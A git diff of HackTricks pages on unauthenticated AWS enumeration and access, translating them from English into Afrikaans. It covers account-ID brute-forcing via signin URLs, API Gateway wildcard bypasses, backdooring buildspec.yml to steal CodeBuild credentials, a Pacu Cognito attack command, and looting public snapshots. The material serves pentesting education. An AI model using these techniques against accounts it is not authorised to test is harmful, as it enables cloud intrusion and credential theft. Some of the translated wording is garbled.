-During the talk they specify several examples, such as S3 buckets **allowing cloudtrai**l (of **any AWS** account) to **write to them**: +Tydens die praatjie spesifiseer hulle verskeie voorbeelde, soos S3-buckets wat **cloudtrail** (van **enige AWS** rekening) toelaat om **na hulle te skryf**: ![](<../../../images/image (260).png>) -Other services found vulnerable: +Ander dienste wat kwesbaar gevind is: - AWS Config - Serverless repository -## Tools +## Gereedskap -- [**cloud_enum**](https://github.com/initstring/cloud_enum): Multi-cloud OSINT tool. **Find public resources** in AWS, Azure, and Google Cloud. Supported AWS services: Open / Protected S3 Buckets, awsapps (WorkMail, WorkDocs, Connect, etc.) +- [**cloud_enum**](https://github.com/initstring/cloud_enum): Multi-cloud OSINT gereedskap. **Vind openbare hulpbronne** in AWS, Azure, en Google Cloud. Ondersteunde AWS dienste: Open / Beskermde S3 Buckets, awsapps (WorkMail, WorkDocs, Connect, ens.) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md index 84c70ed0e..138a572cb 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md 
@@ -4,12 +4,11 @@ ## Account IDs -If you have a target there are ways to try to identify account IDs of accounts related to the target. +As jy 'n teiken het, is daar maniere om te probeer om rekening-ID's van rekeninge wat met die teiken verband hou, te identifiseer. ### Brute-Force -You create a list of potential account IDs and aliases and check them - +Jy skep 'n lys van potensiĂ«le rekening-ID's en aliase en kontroleer hulle. ```bash # Check if an account ID exists curl -v https://.signin.aws.amazon.com @@ -17,33 +16,28 @@ curl -v https://.signin.aws.amazon.com ## It also works from account aliases curl -v https://vodafone-uk2.signin.aws.amazon.com ``` - You can [automate this process with this tool](https://github.com/dagrz/aws_pwn/blob/master/reconnaissance/validate_accounts.py). ### OSINT -Look for urls that contains `.signin.aws.amazon.com` with an **alias related to the organization**. +Soek na urls wat `.signin.aws.amazon.com` bevat met 'n **alias wat verband hou met die organisasie**. ### Marketplace -If a vendor has **instances in the marketplace,** you can get the owner id (account id) of the AWS account he used. +As 'n verkoper **instansies in die marketplace het,** kan jy die eienaar id (rekening id) van die AWS rekening wat hy gebruik het, kry. ### Snapshots -- Public EBS snapshots (EC2 -> Snapshots -> Public Snapshots) -- RDS public snapshots (RDS -> Snapshots -> All Public Snapshots) -- Public AMIs (EC2 -> AMIs -> Public images) +- Publieke EBS snapshots (EC2 -> Snapshots -> Publieke Snapshots) +- RDS publieke snapshots (RDS -> Snapshots -> Alle Publieke Snapshots) +- Publieke AMIs (EC2 -> AMIs -> Publieke beelde) ### Errors -Many AWS error messages (even access denied) will give that information. +Baie AWS foutboodskappe (selfs toegang geweier) sal daardie inligting gee. ## References - [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) {{#include ../../../banners/hacktricks-training.md}} - - - - 
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md index 5a69bebe0..a854719a8 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md 
@@ -1,60 +1,52 @@ -# AWS - API Gateway Unauthenticated Enum +# AWS - API Gateway Ongeauthentiseerde Enum {{#include ../../../banners/hacktricks-training.md}} -### API Invoke bypass - -According to the talk [Attack Vectors for APIs Using AWS API Gateway Lambda Authorizers - Alexandre & Leonardo](https://www.youtube.com/watch?v=bsPKk7WDOnE), Lambda Authorizers can be configured **using IAM syntax** to give permissions to invoke API endpoints. This is taken [**from the docs**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html): +### API Aanroep omseiling +Volgens die praatjie [Aanval Vektore vir API's wat AWS API Gateway Lambda Authorizers Gebruik - Alexandre & Leonardo](https://www.youtube.com/watch?v=bsPKk7WDOnE), kan Lambda Authorizers geconfigureer word **met IAM-sintaksis** om toestemmings te gee om API-eindpunte aan te roep. Dit is geneem [**uit die dokumentasie**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html): ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Permission", - "Action": ["execute-api:Execution-operation"], - "Resource": [ - "arn:aws:execute-api:region:account-id:api-id/stage/METHOD_HTTP_VERB/Resource-path" - ] - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Permission", +"Action": ["execute-api:Execution-operation"], +"Resource": [ +"arn:aws:execute-api:region:account-id:api-id/stage/METHOD_HTTP_VERB/Resource-path" +] +} +] } ``` +Die probleem met hierdie manier om toestemmings te gee om eindpunte aan te roep, is dat die **"\*" impliseer "enigiets"** en daar is **geen verdere regex-sintaksis ondersteun** nie. -The problem with this way to give permissions to invoke endpoints is that the **"\*" implies "anything"** and there is **no more regex syntax supported**. 
+Sommige voorbeelde: -Some examples: - -- A rule such as `arn:aws:execute-apis:sa-east-1:accid:api-id/prod/*/dashboard/*` in order to give each user access to `/dashboard/user/{username}` will give them access to other routes such as `/admin/dashboard/createAdmin` for example. +- 'n ReĂ«l soos `arn:aws:execute-apis:sa-east-1:accid:api-id/prod/*/dashboard/*` om elke gebruiker toegang te gee tot `/dashboard/user/{username}` sal hulle toegang gee tot ander roetes soos `/admin/dashboard/createAdmin` byvoorbeeld. > [!WARNING] -> Note that **"\*" doesn't stop expanding with slashes**, therefore, if you use "\*" in api-id for example, it could also indicate "any stage" or "any method" as long as the final regex is still valid.\ +> Let daarop dat **"\*" nie stop om uit te brei met skewe streepies nie**, daarom, as jy "\*" in api-id gebruik byvoorbeeld, kan dit ook "enige fase" of "enige metode" aandui solank die finale regex steeds geldig is.\ > So `arn:aws:execute-apis:sa-east-1:accid:*/prod/GET/dashboard/*`\ -> Can validate a post request to test stage to the path `/prod/GET/dashboard/admin` for example. +> Kan 'n posversoek valideer om die toetsfase na die pad `/prod/GET/dashboard/admin` byvoorbeeld. -You should always have clear what you want to allow to access and then check if other scenarios are possible with the permissions granted. +Jy moet altyd duidelik hĂȘ wat jy wil toelaat om toegang te hĂȘ en dan kyk of ander scenario's moontlik is met die toestemmings wat gegee is. -For more info, apart of the [**docs**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html), you can find code to implement authorizers in [**this official aws github**](https://github.com/awslabs/aws-apigateway-lambda-authorizer-blueprints/tree/master/blueprints). 
+Vir meer inligting, behalwe die [**docs**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html), kan jy kode vind om outeurs te implementeer in [**hierdie amptelike aws github**](https://github.com/awslabs/aws-apigateway-lambda-authorizer-blueprints/tree/master/blueprints). -### IAM Policy Injection +### IAM Beleid Inspuiting -In the same [**talk** ](https://www.youtube.com/watch?v=bsPKk7WDOnE)it's exposed the fact that if the code is using **user input** to **generate the IAM policies**, wildcards (and others such as "." or specific strings) can be included in there with the goal of **bypassing restrictions**. - -### Public URL template +In dieselfde [**praatjie** ](https://www.youtube.com/watch?v=bsPKk7WDOnE) word die feit blootgestel dat as die kode **gebruikersinvoer** gebruik om die **IAM-beleide** te **genereer**, wildcard (en ander soos "." of spesifieke strings) daarin ingesluit kan word met die doel om **beperkings te omseil**. +### Publieke URL-sjabloon ``` https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided} ``` +### Kry rekening ID van openbare API Gateway URL -### Get Account ID from public API Gateway URL +Net soos met S3-buckets, Data Exchange en Lambda URL-gateways, is dit moontlik om die rekening ID van 'n rekening te vind deur die **`aws:ResourceAccount`** **Beleidstoestand Sleutel** van 'n openbare API Gateway URL te misbruik. Dit word gedoen deur die rekening ID een karakter op 'n slag te vind deur wildcard-teken in die **`aws:ResourceAccount`** afdeling van die beleid te misbruik.\ +Hierdie tegniek laat ook toe om **waardes van etikette** te verkry as jy die etiket sleutel ken (daar is 'n paar standaard interessante). -Just like with S3 buckets, Data Exchange and Lambda URLs gateways, It's possible to find the account ID of an account abusing the **`aws:ResourceAccount`** **Policy Condition Key** from a public API Gateway URL. 
This is done by finding the account ID one character at a time abusing wildcards in the **`aws:ResourceAccount`** section of the policy.\ -This technique also allows to get **values of tags** if you know the tag key (there some default interesting ones). - -You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation. +Jy kan meer inligting vind in die [**oorspronklike navorsing**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) en die hulpmiddel [**conditional-love**](https://github.com/plerionhq/conditional-love/) om hierdie uitbuiting te outomatiseer. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md index 0284e2514..64c03bec5 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md @@ -2,14 +2,8 @@ {{#include ../../../banners/hacktricks-training.md}} -### Public URL template - +### Publieke URL-sjabloon ``` https://{random_id}.cloudfront.net ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md index d95410a62..17cbc0d84 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md 
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md @@ -1,10 +1,10 @@ -# AWS - CodeBuild Unauthenticated Access +# AWS - CodeBuild Ongeverifieerde Toegang {{#include ../../../banners/hacktricks-training.md}} ## CodeBuild -For more info check this page: +Vir meer inligting, kyk na hierdie bladsy: {{#ref}} ../aws-services/aws-codebuild-enum.md 
@@ -12,28 +12,22 @@ For more info check this page: ### buildspec.yml -If you compromise write access over a repository containing a file named **`buildspec.yml`**, you could **backdoor** this file, which specifies the **commands that are going to be executed** inside a CodeBuild project and exfiltrate the secrets, compromise what is done and also compromise the **CodeBuild IAM role credentials**. +As jy skrywe toegang oor 'n repository wat 'n lĂȘer genaamd **`buildspec.yml`** bevat, kan jy hierdie lĂȘer **backdoor**, wat die **opdragte spesifiseer wat binne 'n CodeBuild projek uitgevoer gaan word** en die geheime ontgin, wat gedoen word, en ook die **CodeBuild IAM rol geloofsbriewe** kompromenteer. -Note that even if there isn't any **`buildspec.yml`** file but you know Codebuild is being used (or a different CI/CD) **modifying some legit code** that is going to be executed can also get you a reverse shell for example. +Let daarop dat selfs al is daar geen **`buildspec.yml`** lĂȘer nie, maar jy weet Codebuild word gebruik (of 'n ander CI/CD), kan **modifisering van 'n paar wettige kode** wat uitgevoer gaan word, jou ook 'n omgekeerde shell gee byvoorbeeld. -For some related information you could check the page about how to attack Github Actions (similar to this): +Vir sommige verwante inligting kan jy die bladsy oor hoe om Github Actions aan te val (soortgelyk aan hierdie) kyk: {{#ref}} ../../../pentesting-ci-cd/github-security/abusing-github-actions/ {{#endref}} -## Self-hosted GitHub Actions runners in AWS CodeBuild - -As [**indicated in the docs**](https://docs.aws.amazon.com/codebuild/latest/userguide/action-runner.html), It's possible to configure **CodeBuild** to run **self-hosted Github actions** when a workflow is triggered inside a Github repo configured. 
This can be detected checking the CodeBuild project configuration because the **`Event type`** needs to contain: **`WORKFLOW_JOB_QUEUED`** and in a Github Workflow because it will select a **self-hosted** runner like this: +## Self-gehoste GitHub Actions runners in AWS CodeBuild +Soos [**aangegee in die dokumentasie**](https://docs.aws.amazon.com/codebuild/latest/userguide/action-runner.html), is dit moontlik om **CodeBuild** te konfigureer om **self-gehoste Github aksies** te laat loop wanneer 'n werksvloei binne 'n Github repo geconfigureer word, geaktiveer word. Dit kan opgespoor word deur die CodeBuild projekkonfigurasie te kontroleer omdat die **`Event type`** moet bevat: **`WORKFLOW_JOB_QUEUED`** en in 'n Github Werksvloei omdat dit 'n **self-gehoste** runner soos hierdie sal kies: ```bash runs-on: codebuild--${{ github.run_id }}-${{ github.run_attempt }} ``` - -This new relationship between Github Actions and AWS creates another way to compromise AWS from Github as the code in Github will be running in a CodeBuild project with an IAM role attached. +Hierdie nuwe verhouding tussen Github Actions en AWS skep 'n ander manier om AWS vanaf Github te kompromitteer, aangesien die kode in Github in 'n CodeBuild-projek met 'n IAM-rol aangeheg sal wees. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md index 6f26f3a34..1a10d32bd 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md 
@@ -4,9 +4,9 @@ ## Unauthenticated Cognito -Cognito is an AWS service that enable developers to **grant their app users access to AWS services**. Developers will grant **IAM roles to authenticated users** in their app (potentially people willbe able to just sign up) and they can also grant an **IAM role to unauthenticated users**. +Cognito is 'n AWS-diens wat ontwikkelaars in staat stel om **hul app-gebruikers toegang tot AWS-dienste** te **gee**. Ontwikkelaars sal **IAM-rolle aan geverifieerde gebruikers** in hul app toeken, en hulle kan ook 'n **IAM-rol aan nie-geverifieerde gebruikers** toeken. -For basic info about Cognito check: +Vir basiese inligting oor Cognito, kyk: {{#ref}} ../aws-services/aws-cognito-enum/ 
@@ -14,39 +14,31 @@ For basic info about Cognito check: ### Identity Pool ID -Identity Pools can grant **IAM roles to unauthenticated users** that just **know the Identity Pool ID** (which is fairly common to **find**), and attacker with this info could try to **access that IAM rol**e and exploit it.\ -Moreoever, IAM roles could also be assigned to **authenticated users** that access the Identity Pool. If an attacker can **register a user** or already has **access to the identity provider** used in the identity pool you could access to the **IAM role being given to authenticated** users and abuse its privileges. +Identiteitspoele kan **IAM-rolle aan nie-geverifieerde gebruikers** toeken wat net **die Identiteitspoel-ID** ken (wat redelik algemeen is om te **vind**), en 'n aanvaller met hierdie inligting kan probeer om **toegang tot daardie IAM-rol** te verkry en dit te misbruik.\ +Boonop kan IAM-rolle ook toegeken word aan **geverifieerde gebruikers** wat toegang tot die Identiteitspoel het. As 'n aanvaller **'n gebruiker kan registreer** of reeds **toegang tot die identiteitsverskaffer** het wat in die identiteitspoel gebruik word, kan jy toegang verkry tot die **IAM-rol wat aan geverifieerde** gebruikers gegee word en sy voorregte misbruik. -[**Check how to do that here**](../aws-services/aws-cognito-enum/cognito-identity-pools.md). +[**Kyk hoe om dit hier te doen**](../aws-services/aws-cognito-enum/cognito-identity-pools.md). ### User Pool ID -By default Cognito allows to **register new user**. Being able to register a user might give you **access** to the **underlaying application** or to the **authenticated IAM access role of an Identity Pool** that is accepting as identity provider the Cognito User Pool. [**Check how to do that here**](../aws-services/aws-cognito-enum/cognito-user-pools.md#registration). +Standaard laat Cognito toe om **nuwe gebruikers te registreer**. 
Om 'n gebruiker te kan registreer, kan jou **toegang** gee tot die **onderliggende toepassing** of tot die **geverifieerde IAM-toegang rol van 'n Identiteitspoel** wat die Cognito-gebruikerspoel as identiteitsverskaffer aanvaar. [**Kyk hoe om dit hier te doen**](../aws-services/aws-cognito-enum/cognito-user-pools.md#registration). ### Pacu modules for pentesting and enumeration -[Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc. +[Pacu](https://github.com/RhinoSecurityLabs/pacu), die AWS-uitbuitingsraamwerk, sluit nou die "cognito\_\_enum" en "cognito\_\_attack" modules in wat die enumerasie van alle Cognito-bates in 'n rekening outomatiseer en swak konfigurasies, gebruikersattributen wat vir toegangbeheer gebruik word, ens., merk, en ook die skepping van gebruikers outomatiseer (insluitend MFA-ondersteuning) en voorregte-eskalasie gebaseer op aanpasbare aangepaste attributen, bruikbare identiteitspoelakkredite, aanneembare rolle in id tokens, ens. -For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page. +Vir 'n beskrywing van die modules se funksies, sien deel 2 van die [blogpos](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). Vir installasie-instruksies, sien die hoof [Pacu](https://github.com/RhinoSecurityLabs/pacu) bladsy. 
#### Usage -Sample `cognito__attack` usage to attempt user creation and all privesc vectors against a given identity pool and user pool client: - +Voorbeeld `cognito__attack` gebruik om te probeer om gebruikers te skep en alle privesc-vectors teen 'n gegewe identiteitspoel en gebruikerspoelklient: ```bash Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX ``` - -Sample cognito\_\_enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account: - +Voorbeeld cognito\_\_enum gebruik om al die gebruikerspoele, gebruikerspoel kliĂ«nte, identiteitspoele, gebruikers, ens. wat sigbaar is in die huidige AWS-rekening, te versamel: ```bash Pacu (new:test) > run cognito__enum ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md index 004a92c2b..e79484982 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md @@ -2,14 +2,8 @@ {{#include ../../../banners/hacktricks-training.md}} -### Public URL template - +### Publieke URL-sjabloon ``` .cluster-..docdb.amazonaws.com ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md index e9e7fa8e4..0b93df617 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md 
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md @@ -1,19 +1,15 @@ -# AWS - DynamoDB Unauthenticated Access +# AWS - DynamoDB Ongeauthentiseerde Toegang {{#include ../../../banners/hacktricks-training.md}} ## Dynamo DB -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-dynamodb-enum.md {{#endref}} -Apart from giving access to all AWS or some compromised external AWS account, or have some SQL injections in an application that communicates with DynamoDB I'm don't know more options to access AWS accounts from DynamoDB. +Behalwe om toegang te gee tot alle AWS of sommige gecompromitteerde eksterne AWS-rekeninge, of om 'n paar SQL-inspuitings in 'n toepassing wat met DynamoDB kommunikeer te hĂȘ, weet ek nie van meer opsies om toegang tot AWS-rekeninge vanaf DynamoDB te verkry nie. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md index 657bf7f3a..681acd5d2 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md @@ -4,7 +4,7 @@ ## EC2 & Related Services -Check in this page more information about this: +Kyk op hierdie bladsy vir meer inligting oor dit: {{#ref}} ../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ 
@@ -12,7 +12,7 @@ Check in this page more information about this: ### Public Ports -It's possible to expose the **any port of the virtual machines to the internet**. Depending on **what is running** in the exposed the port an attacker could abuse it. +Dit is moontlik om die **enige poort van die virtuele masjiene aan die internet bloot te stel**. Afhangende van **wat loop** in die blootgestelde poort, kan 'n aanvaller dit misbruik. #### SSRF @@ -22,8 +22,7 @@ https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/clou ### Public AMIs & EBS Snapshots -AWS allows to **give access to anyone to download AMIs and Snapshots**. You can list these resources very easily from your own account: - +AWS laat toe om **toegang aan enigiemand te gee om AMIs en Snapshots af te laai**. Jy kan hierdie hulpbronne baie maklik vanaf jou eie rekening lys: ```bash # Public AMIs aws ec2 describe-images --executable-users all @@ -38,11 +37,9 @@ aws ec2 describe-images --executable-users all --query 'Images[?contains(ImageLo aws ec2 describe-snapshots --restorable-by-user-ids all aws ec2 describe-snapshots --restorable-by-user-ids all | jq '.Snapshots[] | select(.OwnerId == "099720109477")' ``` +As jy 'n snapshot vind wat deur enigiemand herstel kan word, maak seker om [AWS - EBS Snapshot Dump](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump) na te gaan vir riglyne oor die aflaai en plundering van die snapshot. -If you find a snapshot that is restorable by anyone, make sure to check [AWS - EBS Snapshot Dump](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump) for directions on downloading and looting the snapshot. - -#### Public URL template - +#### Publieke URL-sjabloon ```bash # EC2 ec2-{ip-seperated}.compute-1.amazonaws.com 
@@ -50,15 +47,8 @@ ec2-{ip-seperated}.compute-1.amazonaws.com http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443 https://{user_provided}-{random_id}.{region}.elb.amazonaws.com ``` - -### Enumerate EC2 instances with public IP - +### Lys EC2-instansies met openbare IP ```bash aws ec2 describe-instances --query "Reservations[].Instances[?PublicIpAddress!=null].PublicIpAddress" --output text ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md index 2febbed62..eefa936ca 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md 
@@ -4,35 +4,27 @@ ## ECR -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-ecr-enum.md {{#endref}} -### Public registry repositories (images) - -As mentioned in the ECS Enum section, a public registry is **accessible by anyone** uses the format **`public.ecr.aws//`**. If a public repository URL is located by an attacker he could **download the image and search for sensitive information** in the metadata and content of the image. +### Publieke registrasie repositories (beelde) +Soos genoem in die ECS Enum afdeling, is 'n publieke registrasie **toeganklik vir enigiemand** en gebruik die formaat **`public.ecr.aws//`**. As 'n publieke repository URL deur 'n aanvaller gevind word, kan hy **die beeld aflaai en soek na sensitiewe inligting** in die metadata en inhoud van die beeld. ```bash aws ecr describe-repositories --query 'repositories[?repositoryUriPublic == `true`].repositoryName' --output text ``` - > [!WARNING] -> This could also happen in **private registries** where a registry policy or a repository policy is **granting access for example to `"AWS": "*"`**. Anyone with an AWS account could access that repo. +> Dit kan ook gebeur in **privaat registries** waar 'n registry-beleid of 'n repository-beleid **toegang verleen byvoorbeeld aan `"AWS": "*"`**. Enigeen met 'n AWS-rekening kan toegang tot daardie repo verkry. -### Enumerate Private Repo - -The tools [**skopeo**](https://github.com/containers/skopeo) and [**crane**](https://github.com/google/go-containerregistry/blob/main/cmd/crane/doc/crane.md) can be used to list accessible repositories inside a private registry. +### Enumereer Privaat Repo +Die gereedskap [**skopeo**](https://github.com/containers/skopeo) en [**crane**](https://github.com/google/go-containerregistry/blob/main/cmd/crane/doc/crane.md) kan gebruik word om toeganklike repositories binne 'n privaat registry te lys. 
```bash # Get image names skopeo list-tags docker:// | grep -oP '(?<=^Name: ).+' crane ls | sed 's/ .*//' ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md index 8d0b02ba2..b482812c6 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md @@ -4,16 +4,15 @@ ## ECS -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-ecs-enum.md {{#endref}} -### Publicly Accessible Security Group or Load Balancer for ECS Services - -A misconfigured security group that **allows inbound traffic from the internet (0.0.0.0/0 or ::/0)** to the Amazon ECS services could expose the AWS resources to attacks. +### Publiek Toeganklike Sekuriteitsgroep of Laaibalanser vir ECS Dienste +'n Foutief geconfigureerde sekuriteitsgroep wat **inkomende verkeer van die internet (0.0.0.0/0 of ::/0)** na die Amazon ECS dienste toelaat, kan die AWS hulpbronne aan aanvalle blootstel. ```bash # Example of detecting misconfigured security group for ECS services aws ec2 describe-security-groups --query 'SecurityGroups[?IpPermissions[?contains(IpRanges[].CidrIp, `0.0.0.0/0`) || contains(Ipv6Ranges[].CidrIpv6, `::/0`)]]' @@ -21,9 +20,4 @@ aws ec2 describe-security-groups --query 'SecurityGroups[?IpPermissions[?contain # Example of detecting a publicly accessible load balancer for ECS services aws elbv2 describe-load-balancers --query 'LoadBalancers[?Scheme == `internet-facing`]' ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - 
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md index 3a73a7328..181799793 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md 
@@ -1,41 +1,35 @@ -# AWS - Elastic Beanstalk Unauthenticated Enum +# AWS - Elastic Beanstalk Ongeauthentiseerde Enum {{#include ../../../banners/hacktricks-training.md}} ## Elastic Beanstalk -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-elastic-beanstalk-enum.md {{#endref}} -### Web vulnerability +### Web kwesbaarheid -Note that by default Beanstalk environments have the **Metadatav1 disabled**. +Let daarop dat Beanstalk omgewings standaard die **Metadatav1 gedeaktiveer** het. -The format of the Beanstalk web pages is **`https://-env..elasticbeanstalk.com/`** +Die formaat van die Beanstalk webbladsye is **`https://-env..elasticbeanstalk.com/`** -### Insecure Security Group Rules +### Onveilige Sekuriteitsgroep ReĂ«ls -Misconfigured security group rules can expose Elastic Beanstalk instances to the public. **Overly permissive ingress rules, such as allowing traffic from any IP address (0.0.0.0/0) on sensitive ports, can enable attackers to access the instance**. +Sleg geconfigureerde sekuriteitsgroep reĂ«ls kan Elastic Beanstalk instansies aan die publiek blootstel. **Oormatig toelaatbare inkomende reĂ«ls, soos om verkeer van enige IP adres (0.0.0.0/0) op sensitiewe poorte toe te laat, kan aanvallers in staat stel om toegang tot die instansie te verkry**. -### Publicly Accessible Load Balancer +### Publiek Toeganklike Laaibalanser -If an Elastic Beanstalk environment uses a load balancer and the load balancer is configured to be publicly accessible, attackers can **send requests directly to the load balancer**. While this might not be an issue for web applications intended to be publicly accessible, it could be a problem for private applications or environments. +As 'n Elastic Beanstalk omgewing 'n laaibalanser gebruik en die laaibalanser geconfigureer is om publiek toeganklik te wees, kan aanvallers **versoeke direk na die laaibalanser stuur**. 
